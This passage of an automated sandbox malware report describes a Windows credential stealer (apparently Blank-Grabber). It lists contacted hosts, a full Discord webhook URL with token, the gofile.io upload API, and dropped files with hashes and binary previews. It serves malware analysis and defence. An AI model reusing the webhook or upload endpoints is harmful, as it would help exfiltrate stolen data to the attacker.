                                                                                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallKpHYfxnJs6.exe, 00000004.00000003.2742238801.0000000007AE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://www.rfc-editor.org/rfc/rfc8259#section-8.1KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000003.2484058044.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484185809.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484414365.00000000075F6000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://contoso.com/powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        http://www.iana.org/time-zones/repository/tz-link.htmlKpHYfxnJs6.exe, 00000004.00000003.2480053850.000000000750B000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479725177.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479963296.00000000075A5000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2479932107.0000000007506000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://api.gofile.io/getServerKpHYfxnJs6.exe, 00000004.00000002.2887094971.0000000007680000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngKpHYfxnJs6.exe, 00000004.00000002.2886083384.0000000007480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000E.00000002.2545646683.0000000006036000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000046.00000002.2729350973.000000000575C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://discord.com/api/webhooks/1325289657537396889/J06FnIZUAv7ve4gZB3OnZqf37kI5zFxJAxHAJD7bveXtJPDKpHYfxnJs6.exe, 00000004.00000002.2894515812.0000000007E50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://sectigo.com/CPS0KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/KpHYfxnJs6.exe, KpHYfxnJs6.exe, 00000004.00000002.2886740253.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2621613704.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2602474054.0000000007605000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2880087065.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2629341619.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2674550956.000000000762D000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2598446377.00000000075A4000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2485343382.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743962657.0000000007628000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2677988442.000000000762E000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2743181116.00000000075A7000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2652879260.000000000762F000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2484992924.0000000007616000.00000004.00000020.00020000.00000000.sdmp, KpHYfxnJs6.exe, 00000004.00000003.2684053799.0000000007628000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoKpHYfxnJs6.exe, 00000004.00000003.2742616190.0000000007D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://ocsp.thawte.com0KpHYfxnJs6.exe, 00000000.00000003.2050969892.00000000050F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngzKpHYfxnJs6.exe, 00000004.00000003.2478427258.00000000074FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            https://www.wykop.pl/KpHYfxnJs6.exe, 00000004.00000002.2891396339.00000000079D0000.00000004.00001000.00020000.00000000.sdmpfalse

                                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                                              		ip-api.comUnited States
                                                                                                                                                                                                                              		53334TUT-ASUStrue
                                                                                                                                                                                                                              162.159.137.232
                                                                                                                                                                                                                              		discord.comUnited States
                                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                              General Information

                                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                              Analysis ID:1584305
                                                                                                                                                                                                                              Start date and time:2025-01-05 07:17:07 +01:00
                                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                              Overall analysis duration:0h 13m 8s
                                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                              Number of analysed new started processes analysed:131
                                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                                              Sample name:KpHYfxnJs6.exe
                                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                                              Original Sample Name:6a595507f7b92e6af81d2c67f310629a552de261ed6e6e2a2170b71a7503ed31.exe
                                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                                              Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@206/55@4/2
                                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                                              • Successful, ratio: 33.3%
                                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                                              • Successful, ratio: 67%
                                                                                                                                                                                                                              • Number of executed functions: 182
                                                                                                                                                                                                                              • Number of non-executed functions: 92
                                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.85.23.206, 40.69.42.241, 142.250.185.195, 13.107.246.45
                                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, gstatic.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                              • Execution Graph export aborted for target KpHYfxnJs6.exe, PID 7320 because there are no executed function
                                                                                                                                                                                                                              • Execution Graph export aborted for target KpHYfxnJs6.exe, PID 7732 because there are no executed function
                                                                                                                                                                                                                              • Execution Graph export aborted for target mshta.exe, PID 8168 because there are no executed function
                                                                                                                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7048 because it is empty
                                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                              01:19:21API Interceptor133x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                              01:19:22API Interceptor8x Sleep call for process: WMIC.exe modified

                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1244
                                                                                                                                                                                                                              Entropy (8bit):5.378563660172776
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:3RfWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9tXt/NK3R8qrs:5WSU4xymI4RfoUeW+mZ9tlNWR8qA
                                                                                                                                                                                                                              MD5:C558085590884BA7195913DD0E44582F
                                                                                                                                                                                                                              SHA1:5132D7FACAE7A09E0AEFBE7EABF69106CA55E609
                                                                                                                                                                                                                              SHA-256:21A4036000FEA9E1B5F3548E0900ED3268D007CA80FF982724C48569D73D56AE
                                                                                                                                                                                                                              SHA-512:536A6DC6798D2812027D69DAC5BB998256FC159F4C22E5CAF928339424ADBE97C421FD8E964FDEAEF9903024B1363821138D0C7E17FC54081FA0A4D3C8298B77
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:@...e.................................:..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\ ? \Display (1).png

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):704560
                                                                                                                                                                                                                              Entropy (8bit):7.9282919345296925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12288:NCJt7Gi9YHYWTnROPopFVOo0SrQLTZ6BfY0f9wb4UyJ2OtOgQf/3hkdN:NCT9qTnU6FtrQLVyfY0f9WtfhXfP+dN
                                                                                                                                                                                                                              MD5:F29A15EEE3DB90905B9A36E712392BE3
                                                                                                                                                                                                                              SHA1:9A5351EB40071CB4F48AF24C5AF283C69E81166E
                                                                                                                                                                                                                              SHA-256:270C511F7BB40AAF3BAE5488BDA9910B05BB059640D7C06D77215E749B951258
                                                                                                                                                                                                                              SHA-512:707C3BE5E1EFBA3350AB416D24C2CC051C7CB33C5DD6C58D7DAEBF0857BEBBDC830E8FE7B5A02A09611E6B38CB30ACB9C30C4F516E4C148BC16EFA9609449AFF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...^.v..{NW...)..3.].=..9m.v.m.EH..lc...x7.}........`..$.b....-..I...........R.89.w"./..|.......Z.7BoY..M.s3c+......m..?2...0....9.s....~....#}..x_.d$....5@....v...}.z......v.k..T..)...'..N..X..}'.e-....mA..C.~....WP?vI..^S;fqG..=t.G-...&.#_..}?[8...rO..........aS.....?~1...A....%}?.q}........{......g.D...%.......<.....<U..>......7...|........x_.....-...O.W.H..T..... 6.O&......P?.....~C......T....A.yK}..v.Ca....c.?2....N.}....}..(.L..'..G}..C.....q\?..c\k..|.~.c...../.J.k...<..o.yUl.......{.{.....}1.......)6n....}b..1..{...y..v_..17.v........-.4....{^..s..v,..G;....zo.c.....6;.6...G.C...>7..#.[...8...D}.{.....{.}c....=..-....=...%...$.v.;.w...1..#^+....Lycw....[.n..%.......?..].I....9.c.s.......v....|D....H..pg....lB..w'.<b}..}...O.3.mwG..!.o.X}......c....>h/...>........x.v1o..C..x..'.<A.y`n...3.1.O......m)....).\].k1..i..q,..kN.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CoY55.zip

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe
                                                                                                                                                                                                                              File Type:RAR archive data, v5
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):755918
                                                                                                                                                                                                                              Entropy (8bit):7.999753224954264
                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                              SSDEEP:12288:wKYOGvcMY9XCDe6JUvt1ekT0+y2PUJvLoB8mAwGjK1cpTXoKWO6EDXmz9nLN8CGI:HYVWhSJUvik9sJDI8mGjK1cpboKWO6E2
                                                                                                                                                                                                                              MD5:D2E40973483140EFCD32F357D22FAD0A
                                                                                                                                                                                                                              SHA1:397AE63687109602E54ECF817EF2D495D3F9056D
                                                                                                                                                                                                                              SHA-256:F792D64BBB2E4E8252168BFEAB977A61DF58D90B3E1AA6A950E1A0ED52016CF6
                                                                                                                                                                                                                              SHA-512:6931B9B5B86B78E5BC40B71794671B50CAFC81E636A5674F89838FF2BE94BAD7B6B5596C52C783D56D6FC9654E197C7B250C5357A84BA2A0F1D8FCA9CA8BBF45
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Rar!.....ww.!......J..C259...{.\.......C....XK....]D._.e.]&/..=?..Q.4....|ym..8'8..{4...\....=#..[......KPE.`..4.![>>.[..w@"n.ukAV.u..E..~[..w...hH...k.....3.....e....!..`......E.V(.,.W..;...W.S........M2.g......&....(H.....(.'.ED%.w........QF.~j.6h......I.{........}.0.K..&....pp..%.+&...X~..d..`XsVY.......Ai.@.,0..v..h. ... ........!%.q."G.t^y..&....xi..$7J.a:.1.^'.......V...3z....|\..,.gZP."..JnK/..,F.j.\....K...hI.mK.v$G."..kA#.g.1..~2.9l.3@Q.<^:[..8...#[1..lp}U..oSn.bOlQ......f.:.Vypp........A.s....K............8.|......_v.\ &...G.RGVy...v4u.bb.:+%@ZR.....PWT5=&....p"3..[.6....mQ&&...^.a.wn.Y.>...8c.+pK.MX2.d...f....*.Yk.)/....n_?,.,.l...Z..,.4u..9w..I.Mh[..E...B..^....u..i....e.h./..u.&.f...<u^....d....XX:4....#e...$.-.......Yy.5..'..(,9]i..>....w.E..S. ..B........ub...!...*~....jp.uxbq~..R'/..rf..P..,r....|c.]./..hyH......x......,l7. ..F.`.|3{."S...t...Q;..W..5......*.......a.u.........3'bpXy..."_..9..?+./.[$..7-sj.].n.B.....@..e........_

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\RESED03.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sun Jan 5 07:27:12 2025, 1st section name ".debug$S"
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1372
                                                                                                                                                                                                                              Entropy (8bit):4.101160200971171
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:HDFq9s+fbkDfHhwKMfWvrxfwI+ycuZhN7iakSajPNnqS+d:jgbiqKYWvFo1ulOa3aqSe
                                                                                                                                                                                                                              MD5:86127ED35F6AFAAAD71C18D6D3460552
                                                                                                                                                                                                                              SHA1:CE11B7CA8CACF111D38CC476BC425FCA3DC2F747
                                                                                                                                                                                                                              SHA-256:F465BC5BA99C8BFA36B7AE08BB817836485D2563AE740C9DD895864819DF7DE7
                                                                                                                                                                                                                              SHA-512:E08472DF005F5C906C1D4084D725C74372AB814555BE4ACF85E3FC6601B55C238530466814884BD954173566A1023245D3FD163D6255E7D5F324621B38E0042B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:L...P4zg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP..................M...@./C.K<...........4.......C:\Users\user\AppData\Local\Temp\RESED03.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.i.f.u.c.m.0.t...d.l.l.....(.....L.e.g.a.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\VCRUNTIME140.dll

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):80800
                                                                                                                                                                                                                              Entropy (8bit):6.781496286846518
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
                                                                                                                                                                                                                              MD5:1E6E97D60D411A2DEE8964D3D05ADB15
                                                                                                                                                                                                                              SHA1:0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
                                                                                                                                                                                                                              SHA-256:8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
                                                                                                                                                                                                                              SHA-512:3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq..*"..*"..*"..+#..*".."..*"..+"4.*"}.)#..*"}..#..*"}./#..*"}.*#..*"}.."..*"}.(#..*"Rich..*"........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\_bz2.pyd

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44416
                                                                                                                                                                                                                              Entropy (8bit):7.783586529830432
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:xVhO4M5bIfA9H2Bs9YnYMfUwRVgXm6kTmnbcuyD7U1IDtVD8GYiSyvcPxWE+9:m5MfA9gs9IY0UwZ6kinouy81IDtVDn7l
                                                                                                                                                                                                                              MD5:93C79A5FAAA4D320432B06AE2879F1F4
                                                                                                                                                                                                                              SHA1:772B881874A3947F2205644DF6EBA5972366AAB6
                                                                                                                                                                                                                              SHA-256:02EDA0188E989264FFB5BFE4474EF1BFA36F8A0BAEE6764E11B4AA604CC30D47
                                                                                                                                                                                                                              SHA-512:4757E41FA5260601246EE851D43FCFFA17EB591DD4E5F987E18B77D9C3269431A610F9B32EBC507C64394C29AFE3F7C030D5448417490431742C6C462F156B06
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l0.9(Qgj(Qgj(Qgj!).j"Qgj.*fk*Qgj.*.j+Qgj.*bk$Qgj.*ck"Qgj.*dk*Qgj.*fk+Qgjc)fk*Qgj(QfjtQgj.*ok Qgj.*gk)Qgj.*.j)Qgj.*ek)QgjRich(Qgj........................PE..L...6.Vc...........!...!.............V.......p............................................@.........................P{..H....y.......p.......................{.. ....................................b..............................................UPX0....................................UPX1.............t..................@....rsrc........p.......x..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\_ctypes.pyd

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):52600
                                                                                                                                                                                                                              Entropy (8bit):7.777741053822562
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Nwk9VLAEGrp/zkMJBMwCurvnouy8RIDQPzx7SyGvPx8:Ck9VSgMJBMBuroutRIDQPzxk3x8
                                                                                                                                                                                                                              MD5:35001F868CBC1C3DCD337B1915356B09
                                                                                                                                                                                                                              SHA1:4B1C0E51ED920D29894739DB618952632D6275AA
                                                                                                                                                                                                                              SHA-256:7753972DB061B3FD543EC69ED478E05FE6D98E56960C3BDFAA101164A2508FBD
                                                                                                                                                                                                                              SHA-512:FA9628A69FC532B3805CCA46D4CDBDB40AC4A8187D87FD469B522797368D588D16A2CB286C43544137849858444F71410DEED90DDE0CAC5A34C9C55D69DDF1AC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.f.x...x...x...q...~.......z.......s.......r.......}.......z...3...y...3...~......{...x...........~.......y.......y.......y...Richx...........PE..L...3.Vc...........!...!.........0..p....@................................................@.....................................X...........................|... ...................................P...............................................UPX0.....0..............................UPX1.........@......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\_decimal.pyd

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\KpHYfxnJs6.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):79736
                                                                                                                                                                                                                              Entropy (8bit):7.899012395054576
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:yw/aniAME5OmGy0wakNmsmhGJAylteE9P+AOFGkpwy+Cxt8U2VjInouy8tID5q4d:yw1U5Om50wakNCEJNea+AO/xX0U2lgov
                                                                                                                                                                                                                              MD5:B6F3B12773DCEB50350A472A52C67B74
                                                                                                                                                                                                                              SHA1:2B260CCC29D576BB3C7B6E845F1AEC2DF0028F81
                                                                                                                                                                                                                              SHA-256:65DDF0408964EAF41946ABF0A28E75023E8A872595056B0D9CDB15C5ADDC71BF
                                                                                                                                                                                                                              SHA-512:BDDB3927BB91A82C8D755B5F17E17D5AD8B56D6F24471FECC8FF37E09C12C6750F583A0199114539185FEC17E46F49FE7C381C449BD799DACEFDD4CBBBFC7750
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|g...4...4...4..4...4M..5...4M..5...4M..5...4M..5...4C..5...4...5...4...4W..4C..5...4C..5...4C..4...4C..5...4Rich...4................PE..L.....Vc...........!...!.........0.......@...@...............................P............@.........................hL..P....I.......@.......................L.. ....................................:..............................................UPX0.....0..............................UPX1.........@......................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................................................4.02.UPX!....

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\_MEI73202\_hashlib.pyd

